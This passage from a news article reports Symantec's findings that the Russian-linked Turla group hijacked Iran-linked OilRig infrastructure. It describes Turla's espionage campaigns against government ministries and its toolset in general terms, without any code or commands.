Turla then used this infrastructure in an attack on a government in the Middle East which OilRig had already compromised, the company claimed in a detailed blog post.
[Given the numerous names bestowed on these attack groups, iTWire will use only Turla and OilRig in this article to avoid confusion.]
But this phenomenon was hinted at in research presented by Kaspersky (formerly Kaspersky Lab) researcher Kurt Baumgartner at his employer's annual security analyst summit in Cancun last year. A Russian-speaking online threat actor, Sofacy, sometimes overlapped with other threat actors like Turla and the Chinese-speaking Danti, when targeting victims, his research claimed.
Of interest, given the recent brouhaha over stolen NSA exploits, was Symantec's claim that in the course of its attacks, Turla used a custom hacking tool that combined four tools leaked by the Shadow Brokers — EternalBlue, EternalRomance, DoublePulsar and SMBTouch — into a single executable.
Actors from Turla have been observed to be Russian speakers, while OilRig has been linked to Iran by the security firm FireEye which, admittedly, is quick to attribute attacks which other companies are reluctant to do.
The Symantec post comes at a time of rising US pressure on Iran, following the downing of an American spy drone over Iranian territory, as per claims from Teheran. The Americans claim the incident took place over international waters.
Russia has been under US pressure for a long time, ever since claims were made that it played in a role in the US presidential election of 2016. An investigation of more than two years by former FBI chief Robert Mueller failed to come up with any definitive evidence to support this claim.
Symantec's DeepSight Adversary Intelligence Team said recent activity by Turla could be divided into three campaigns, based on the toolsets used. One used a new backdoor called Neptun that acts as a passive listening tool and infects Microsoft Exchange servers. It was an attack during this campaign that used infrastructure belonging to OilRig.
A second campaign used the publicly available backdoor Meterpreter, along with two custom loaders - a custom backdoor photobased.dll and a customer RPC (Remote Procedure Call) backdoor. A third campaign used a different RPC backdoor built of code derived from PowerShellRunner, a tool that is used to execute PowerShell scripts without using the official PowerShell binary.
Victims of the three Turla campaigns were listed as:
- The foreign affairs ministry of a Latin American country;
- The foreign affairs ministry of a Middle Eastern country;
- The foreign affairs ministry of an European country;
- The interior ministry of a South Asian country;
- Two unidentified government organisations in a Middle Eastern country;
- One unidentified government organisation in a Southeast Asian country;
- A government office of a South Asian country based in another country;
- An information and communications technology organisation in a Middle Eastern country;
- Two information and communications technology organisations in two European countries;
- An information and communications technology organisation in a South Asian country;
- A multinational organisation in a Middle Eastern country; and
- An educational institution in a South Asian country.
Regarding the hijacking of OilRig infrastructure by Turla, Symantec said it was possible that the two groups were, instead, collaborating in attacking the same victim, a target in the Middle East. But it said it had not found further evidence in support of this theory.
"In all likelihood, Turla’s use of OilRig infrastructure appears to have been a hostile takeover," the Symantec team speculated. "Curiously though, Turla also compromised other computers on the victim’s network using its own infrastructure."
Turla's recent campaigns have been marked by the deployment of new tools, Symantec said, listing the following:
- A new custom dropper typically used to install Neptun as a service.
- A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.
- A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.
- Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Turla command and control (C&C) servers.
- PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Turla C&Cs.
- Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, and Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified being downloaded via Turla tools or infrastructure.
Symantec said there could be a number of reasons for the attackers behind Turla choosing to use infrastructure from OilRig.
One was as a false flag operation, to deceive anyone observing the campaign as to the identity of the actual attacker. A second possibility was that Turla used OilRig's infrastructure as the latter had already gained entry to the target.
"This is the first time Symantec has observed one targeted attack group seemingly hijack and use the infrastructure of another group. However, it is still difficult to ascertain the motive behind the attack. Whether Turla simply seized the opportunity to create confusion about the attack or whether there was more strategic thinking involved remains unknown," the researchers wrote.
"Turla's ever-changing toolset demonstrates a high degree of adaptability by a group determined to avoid detection by staying one step ahead of its targets. Frequent retooling and a penchant for flirting with false flag tactics have made this group one of the most challenging adversaries on the targeted attack landscape."